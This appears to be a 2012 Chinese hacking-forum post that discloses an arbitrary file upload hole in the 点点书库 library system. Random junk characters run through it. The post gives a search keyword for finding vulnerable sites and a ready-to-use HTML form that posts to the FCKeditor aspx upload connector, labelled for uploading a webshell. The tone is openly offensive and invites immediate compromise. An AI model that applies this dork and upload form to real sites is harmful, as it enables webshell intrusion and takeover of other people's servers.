主题:图书馆系统任意文件上传漏洞3 p& t- _$ d# d; K
作者:冰锋刺客- g0 a2 L3 F: a% O3 ]# ~
厂商:点击书(dianjishu.com)" V# B, _# U- V& H2 _. R
日期:2012-6-21
4 ?2 M; v2 F3 O
9 d' d: O. T2 U8 ~) LI 概述, i+ M" f: X; C' K
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell" g. \$ k5 A2 Z9 {
II 简介; n. v# \7 O0 Y9 \ ]
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"6 n" w" X" c, E7 k0 J
补充一个漏洞) F4 o7 @* _' u8 ?# L% Z+ ~
<form id="frmUpload" enctype="multipart/form-data"% A6 D7 B; T: u5 F0 q9 |! d6 |8 j
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>: d: g( Q( e3 T8 [
<input id="btnUpload" type="submit" value="操翻他">
1 t. r5 U* ?6 R- a5 q$ b4 M </form>
& X2 {* l) z3 \& u. I0 X 你们懂的( W0 i! r' v& ~, |0 @
那傻逼提供还需要改包.0 t/ Y- E* _5 |8 [9 y# f" S
自己看了下源代码发现fckeditor
& Z- ~, o; c5 V! G& N$ n# p2 f% U+ n 直接秒杀
7 f1 f+ n4 O3 U0 [ |